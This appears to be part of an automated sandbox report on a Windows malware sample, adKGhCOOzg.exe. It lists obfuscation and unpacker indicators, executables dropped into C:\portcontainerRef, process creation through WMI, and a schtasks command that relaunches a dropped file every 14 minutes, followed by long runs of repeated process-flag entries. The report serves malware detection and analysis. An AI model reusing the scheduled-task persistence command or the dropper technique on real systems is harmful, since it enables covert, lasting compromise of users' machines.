            Source: adKGhCOOzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: adKGhCOOzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: adKGhCOOzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: adKGhCOOzg.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 5.2.SurrogateContainerAgent.exe.1c530000.29.raw.unpack, -.cs.Net Code: _0001 System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeFile created: C:\portcontainerRef\__tmp_rar_sfx_access_check_7150937Jump to behavior
            Source: adKGhCOOzg.exeStatic PE information: section name: .didat
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035E28C push eax; ret 0_2_0035E2AA
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035ED46 push ecx; ret 0_2_0035ED59
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 20_2_00007FF887B0FF09 push eax; ret 20_2_00007FF887B10261
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 20_2_00007FF887B10210 push eax; ret 20_2_00007FF887B10261
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 20_2_00007FF887B14526 push E8FFFFFFh; retf 20_2_00007FF887B14531
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BC0220 push eax; ret 28_2_00007FF887BC0261
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BA17FA push ebp; ret 28_2_00007FF887BA18DA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BA1820 push ebp; ret 28_2_00007FF887BA18DA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BA1C81 push edi; ret 28_2_00007FF887BA1C9A
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BA1BE5 push edi; ret 28_2_00007FF887BA1BFA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BA1B75 push esi; ret 28_2_00007FF887BA1B8A
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 28_2_00007FF887BA1A68 push esi; ret 28_2_00007FF887BA1AAA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 31_2_00007FF887B92D23 push es; ret 31_2_00007FF887B92D42
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 31_2_00007FF887B9B78D push es; ret 31_2_00007FF887B9B78F
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 31_2_00007FF887BAFF09 push eax; ret 31_2_00007FF887BB0261
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 31_2_00007FF887B9AD45 push es; ret 31_2_00007FF887B9AD72
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 31_2_00007FF887BA39F2 push eax; ret 31_2_00007FF887BA3A04
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BCD498 push cs; iretd 36_2_00007FF887BCD61A
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BD50D5 pushad ; ret 36_2_00007FF887BD50D6
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BD506E push eax; ret 36_2_00007FF887BD506F
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BCB780 push ss; iretd 36_2_00007FF887BCE85A
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BCF789 push ebx; ret 36_2_00007FF887BCF78A
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BA1C81 push edi; ret 36_2_00007FF887BA1C9A
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BA17FA push ebp; ret 36_2_00007FF887BA18DA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BA1820 push ebp; ret 36_2_00007FF887BA18DA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BA1BE5 push edi; ret 36_2_00007FF887BA1BFA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BA1B75 push esi; ret 36_2_00007FF887BA1B8A
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BA1A68 push esi; ret 36_2_00007FF887BA1AAA
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 36_2_00007FF887BC0220 push eax; ret 36_2_00007FF887BC0261
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BD50D5 pushad ; ret 39_2_00007FF887BD50D6
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeCode function: 39_2_00007FF887BD506E push eax; ret 39_2_00007FF887BD506F

            Persistence and Installation Behavior

            barindex
            Creates processes via WMI
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeJump to dropped file
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile created: C:\Users\user\AppData\Local\Temp\826f54c5c35521aef4aae8ba444affffb02e2dfd.exeJump to dropped file
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeFile created: C:\portcontainerRef\SurrogateContainerAgent.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "zTShuhFeOCWKXCInUCSTgJmEz" /sc MINUTE /mo 14 /tr "'C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe'" /f
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
